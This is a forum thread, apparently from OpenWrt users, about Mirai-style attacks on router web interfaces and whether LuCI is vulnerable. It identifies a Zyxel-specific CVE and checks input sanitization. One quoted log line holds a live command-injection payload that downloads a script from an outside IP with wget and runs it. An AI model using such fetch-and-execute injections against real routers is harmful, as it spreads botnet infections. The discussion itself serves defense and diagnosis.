Mirai botnet - routers under attack

Hello everybody,
I've found a lot of tries (in webserver logs) exploiting routers firmware. Until today it was probably D-Link target (some URLs contains 'dlink'). But today I found:

223.135.114.142 - - [25/Jul/2018:12:31:36 +0200] "GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20http://178.128.11.199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20 HTTP/1.0" 301 178 "-" "-"

So looks like somebody tries to exploit LuCi.
My question - has anybody know is it a known vulnerability?

It's public knowledge that routers are being exploited.

It's not advisable that you open your web GUI to the Internet. In addition, it's not open by default.

See: Is LEDE affected by this? (VPN Filter exploit)

Same things apply for Mirai as VPNFilter in OpenWrt. If you're concerned:

  • block access to port 80 on WAN
  • follow steps in post linked above to clean your router

I wouldn't leave a honeypot open to test this. It's advised by many in this community - that you only connect to LuCI from WAN via SSH or VPN. If someone is able to brute force the password and access your Scheduled Tasks menu, then your device is p0wned.

That string does not look like normal Luci. The expert string in path makes me to think some OEM firmware's easy and expert modes, so the exploit likely targets some OEM variant that is based on old Openwrt. @jow probably knows best if that kind of http query with commands would work with current luci

I assume the OP has seen these attempts in webserver logfiles unrelated to his OpenWrt router. The question is valid:

Indeed it does. It points to an apparant vulnerability in LuCI that doesn't properly sanitize the input to the nslookup function in Network->Diagnostics.

However, the URI
/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic
doesn't match the URI I am seeing in LuCI
/cgi-bin/luci/admin/network/diagnostics
so this would probably target a manufacturer's adaption, or a custom build?

Edit: @hnyman's mind thinks simultaneously and alike.
Edit²: A cursory search suggests that it is Zyxel who made these adaptations to LuCI on their routers.
Edit³: https://nvd.nist.gov/vuln/detail/CVE-2017-6884 -- it is a known vulnerability
Editⁿ⁺¹: I took a look into current LuCI source code, and the respective functions are secured by tokens. Unless I missed some generic sanitization of post parameters, they still do not sanitize input (which in this case really should be done at some point), but there's no attack vector from outside the network, and from the inside it would require a logged-in user, at which point security is pretty much out of the window anyway.

4 Likes

First rule - never, never, never (never) allow access from public to any admin interface :man_student: :white_check_mark:
But there're so many users that don't care about this...

So my router is safe (?) but Mirai is again in the wild - binary samples are detectet by AV as Trojan-Downloader.Shell.Mirai.d (scripts from logs) and ELF files downloaded by script as HEUR:Backdoor.Mirai.b

I only want to point, that another wave of attack and want to be sure that current software is safe.

Well, there are so many routers infected. If above would be true, there'll be any zombie routers botnets but they exist (unfortunatelly).
BTW, @takimata o You remember how to flash LEDE on some routers? HINT: exploiting web interface.

I was, of course, not making a statement about any firmware on any router.

You missed line 409 and 412 of https://github.com/openwrt/luci/blob/master/modules/luci-mod-admin-full/luasrc/controller/admin/network.lua

The extra shell quoting was introduced recently but even before that it was not possible to inject things like $, ` or ;

1 Like

I did. Thanks for the confirmation, that should put some minds further at ease.

1 Like